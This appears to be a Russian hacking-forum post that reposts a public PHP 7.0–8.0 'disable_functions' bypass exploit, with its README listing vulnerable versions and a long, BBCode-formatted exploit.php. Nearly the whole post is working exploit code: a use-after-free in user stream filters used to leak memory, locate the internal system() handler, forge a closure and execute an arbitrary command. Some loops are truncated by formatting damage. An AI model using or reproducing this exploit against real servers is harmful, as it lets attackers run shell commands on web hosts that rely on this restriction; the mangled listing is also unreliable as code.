|
Постоянный
Регистрация: 18.03.2016
Сообщений: 663
С нами:
5344886
Репутация:
441
|
|
PHP 7.0-8.0 disable_functions bypass [user_filter]
https://github.com/mm0r1/exploits/tr...-filter-bypass
.SpoilerTarget" type="button">Spoiler: README.md
PHP 7.0-8.0 disable_functions bypass [user_filter]
This exploit uses a bug reported over 10 years ago. As usual, the PoC was tested on various php builds for Debian/Ubuntu/CentOS/FreeBSD with cli/fpm/apache2 server APIs and found to work reliably.
Targets
- 5.* - exploitable with minor changes to the PoC
- 7.0 - all versions to date
- 7.1 - all versions to date
- 7.2 - all versions to date
- 7.3 - all versions to date
- 7.4 - all versions to date
- 8.0 - all versions to date
Fix
Stop relying on disable_functions (or any other php.ini settings) for security.
Post scriptum
There are many memory corruption vulnerabilities in PHP - some of them are publicly known, others are not. Regardless, PHP devs don't care much about these, as you can see in the bug reports.
This PoC is for demonstration purposes only. The exploits that could've been developed/used during the past decade might be not.
.SpoilerTarget" type="button">Spoiler: exploit.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]filtername[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]Pwn[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]alloc[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]STRING_SIZE[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]fclose[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]stream[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]go[/COLOR][COLOR="#007700"]();
return[/COLOR][COLOR="#0000BB"]PSFS_PASS_ON[/COLOR][COLOR="#007700"];
}
private function[/COLOR][COLOR="#0000BB"]go[/COLOR][COLOR="#007700"]() {
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]abc[/COLOR][COLOR="#007700"]= &[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]filtername[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]make_uaf_obj[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]helper[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]Helper[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]helper[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]b[/COLOR][COLOR="#007700"]= function([/COLOR][COLOR="#0000BB"]$x[/COLOR][COLOR="#007700"]) {};
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]helper_addr[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]str2ptr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]CHUNK_SIZE[/COLOR][COLOR="#007700"]*[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]0x18[/COLOR][COLOR="#007700"]) -[/COLOR][COLOR="#0000BB"]CHUNK_SIZE[/COLOR][COLOR="#007700"]*[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]log[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"helper @ 0x%x"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]helper_addr[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]abc_addr[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]helper_addr[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]CHUNK_SIZE[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]log[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"abc @ 0x%x"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]abc_addr[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]helper_off[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]helper_addr[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]abc_addr[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]0x18[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$helper_handlers[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]str2ptr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]CHUNK_SIZE[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]log[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"helper handlers @ 0x%x"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$helper_handlers[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]prepare_leaker[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$binary_leak[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]read[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$helper_handlers[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]log[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"binary leak @ 0x%x"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$binary_leak[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]prepare_cleanup[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$binary_leak[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$closure_addr[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]str2ptr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]helper_off[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]0x38[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]log[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"real closure @ 0x%x"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$closure_addr[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$closure_ce[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]read[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$closure_addr[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]0x10[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]log[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"closure class_entry @ 0x%x"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$closure_ce[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$basic_funcs[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_basic_funcs[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$closure_ce[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]log[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"basic_functions @ 0x%x"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$basic_funcs[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$zif_system[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_system[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$basic_funcs[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]log[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"zif_system @ 0x%x"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$zif_system[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$fake_closure_off[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]helper_off[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]CHUNK_SIZE[/COLOR][COLOR="#007700"]*[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"];
for([/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]write[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$fake_closure_off[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]read[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$closure_addr[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]));
}
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]write[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$fake_closure_off[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]0x38[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$handler_offset[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]PHP_MAJOR_VERSION[/COLOR][COLOR="#007700"]===[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]0x70[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]0x68[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]write[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$fake_closure_off[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]$handler_offset[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$zif_system[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$fake_closure_addr[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]helper_addr[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]$fake_closure_off[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]helper_off[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]write[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]helper_off[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]0x38[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$fake_closure_addr[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]log[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"fake closure @ 0x%x"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$fake_closure_addr[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]cleanup[/COLOR][COLOR="#007700"]();
([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]helper[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]b[/COLOR][COLOR="#007700"])([/COLOR][COLOR="#0000BB"]CMD[/COLOR][COLOR="#007700"]);
}
private function[/COLOR][COLOR="#0000BB"]make_uaf_obj[/COLOR][COLOR="#007700"]() {
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]uafp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]fopen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'php://memory'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'w'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]fwrite[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]uafp[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]pack[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'QQQ'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0xDEADBAADC0DE[/COLOR][COLOR="#007700"]));
for([/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]uafp[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"\x00"[/COLOR][COLOR="#007700"]);
}
}
private function[/COLOR][COLOR="#0000BB"]prepare_leaker[/COLOR][COLOR="#007700"]() {
[/COLOR][COLOR="#0000BB"]$str_off[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]helper_off[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]CHUNK_SIZE[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]write[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$str_off[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]write[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$str_off[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]0x10[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]6[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$val_off[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]helper_off[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]0x48[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]write[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$val_off[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]helper_addr[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]CHUNK_SIZE[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]write[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$val_off[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0xA[/COLOR][COLOR="#007700"]);
}
private function[/COLOR][COLOR="#0000BB"]prepare_cleanup[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$binary_leak[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$ret_gadget[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$binary_leak[/COLOR][COLOR="#007700"];
do {
--[/COLOR][COLOR="#0000BB"]$ret_gadget[/COLOR][COLOR="#007700"];
} while([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]read[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$ret_gadget[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]) !==[/COLOR][COLOR="#0000BB"]0xC3[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]log[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"ret gadget = 0x%x"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$ret_gadget[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]write[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]abc_addr[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]0x20[/COLOR][COLOR="#007700"]- ([/COLOR][COLOR="#0000BB"]PHP_MAJOR_VERSION[/COLOR][COLOR="#007700"]===[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]0x50[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]0x60[/COLOR][COLOR="#007700"]));
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]write[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$ret_gadget[/COLOR][COLOR="#007700"]);
}
private function[/COLOR][COLOR="#0000BB"]read[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$addr[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$n[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]write[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]helper_off[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]CHUNK_SIZE[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]16[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$addr[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]0x10[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]strlen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]helper[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]c[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]$n[/COLOR][COLOR="#007700"]!==[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"]) {[/COLOR][COLOR="#0000BB"]$value[/COLOR][COLOR="#007700"]&= ([/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]abc[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$p[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]chr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$v[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]0xff[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$v[/COLOR][COLOR="#007700"]>>=[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"];
}
}
private function[/COLOR][COLOR="#0000BB"]get_basic_funcs[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$addr[/COLOR][COLOR="#007700"]) {
while([/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$addr[/COLOR][COLOR="#007700"]-=[/COLOR][COLOR="#0000BB"]0x10[/COLOR][COLOR="#007700"];
if([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]read[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$addr[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"]) ===[/COLOR][COLOR="#0000BB"]0xA8[/COLOR][COLOR="#007700"]&&
[/COLOR][COLOR="#0000BB"]in_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]read[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$addr[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"]),
[[/COLOR][COLOR="#0000BB"]20151012[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]20160303[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]20170718[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]20180731[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]20190902[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]20200930[/COLOR][COLOR="#007700"]])) {
[/COLOR][COLOR="#0000BB"]$module_name_addr[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]read[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$addr[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]0x20[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$module_name[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]read[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$module_name_addr[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]$module_name[/COLOR][COLOR="#007700"]===[/COLOR][COLOR="#0000BB"]0x647261646e617473[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]log[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"standard module @ 0x%x"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$addr[/COLOR][COLOR="#007700"]);
return[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]read[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$addr[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]0x28[/COLOR][COLOR="#007700"]);
}
}
}
}
private function[/COLOR][COLOR="#0000BB"]get_system[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$basic_funcs[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$addr[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$basic_funcs[/COLOR][COLOR="#007700"];
do {
[/COLOR][COLOR="#0000BB"]$f_entry[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]read[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$addr[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$f_name[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]read[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$f_entry[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]6[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]$f_name[/COLOR][COLOR="#007700"]===[/COLOR][COLOR="#0000BB"]0x6d6574737973[/COLOR][COLOR="#007700"]) {
return[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]read[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$addr[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"]);
}
[/COLOR][COLOR="#0000BB"]$addr[/COLOR][COLOR="#007700"]+=[/COLOR][COLOR="#0000BB"]0x20[/COLOR][COLOR="#007700"];
} while([/COLOR][COLOR="#0000BB"]$f_entry[/COLOR][COLOR="#007700"]!==[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]);
}
private function[/COLOR][COLOR="#0000BB"]cleanup[/COLOR][COLOR="#007700"]() {
[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]hfp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]fopen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'php://memory'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'w'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]fwrite[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]hfp[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]pack[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'QQ'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]abc_addr[/COLOR][COLOR="#007700"]));
